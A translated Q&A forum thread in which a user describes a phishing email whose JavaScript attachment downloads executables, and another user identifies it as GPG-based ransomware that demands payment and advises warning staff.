Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
A
A
avvor2015-10-27 13:32:22
Burglary protection
avvor, 2015-10-27 13:32:22

A letter came with js inside, in which strange things happen, who knows what it is?

Today, a letter came to my work mail with a completely harmless content "Good day, We, for our part, understand that there is a crisis in the yard, but, nevertheless, my management proposes to sign the Reconciliation Act (see attachment) ...". I immediately noticed that the attachment with the js extension. I opened it in notepad, there are 3 files downloaded from a certain site - exe, bat and doc.
I couldn’t stop, it became very interesting what it was, raised the virtual machine, picked up the files (even tried to run exe and bat) and decided to write here, maybe someone knows what it is?
1. The bat file inside contains this text:
aa19926d86c34aebaa8a060591143b7a.png
Google translate recognizes this as Chinese: "Yi Pen atonement for idling Liu Jiao pancakes."
How can bat be in Chinese? Is it encrypted with something or scripts can be written in different languages??
2. doc file when opening:
9c38e8ef49074d7fa094701492cdfa8b.png
Again Chinese and it is not clear at all what it is and why.
3. When you run the exe, the GnuPG library is downloaded.
f156773e4a284db3aed9a38ef047f8ae.png
Who knows what this thread is? It became wildly interesting.
Thank you 27cm 27cm , that's what's in the batch file
60598dbb93be43ad838ea6bf85c383e3.png

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

2 answer(s)
Report
I
Irina, 2015-11-02
@avvor

The vault encryptor uses gpg, encrypts all *.doc, *.jpg files, mail, etc., creates a pair of keys and sends its own to scammers, after which it creates a text file with an offer to pay money in order to get the key and decrypt the files. The price of the issue is from 50 to 1000 dollars, a site of scammers in the Tor network. When my users caught this infection, I contacted Casper and Nod32, they confirmed that there was no cure and would not be for a long time, and the virus itself was not detected by antiviruses. So be careful and do explanatory work with users - this is the only way to avoid infection as much as possible.

Report
A
avvor, 2015-10-27
@avvor

And where can I write to block their site? I understand that they will register a new one, but at least do something, people will suffer from such tricks. It came to my corporate mail, managers would 100% open and launch it, I was lucky that I was the first to open the mail in the morning.

Similar questions
U
Uniq2016-08-21 09:31:25
SMS vulnerability or what is it? 2Reply
N
Nikitos12122019-01-23 05:30:01
How to decode GoldCoders? 0Reply
C
Chvalov2014-09-02 11:54:21
How to intercept and edit a TCP packet on the fly? 2Reply
B
black12014-09-12 09:19:07
The vk.com certificate is forged, how to catch (Provider, proxy, hack programs) who is doing this? 1Reply
D
Dmitry Dievsky2016-10-12 21:20:55
Anonymous mail which one to choose? 3Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question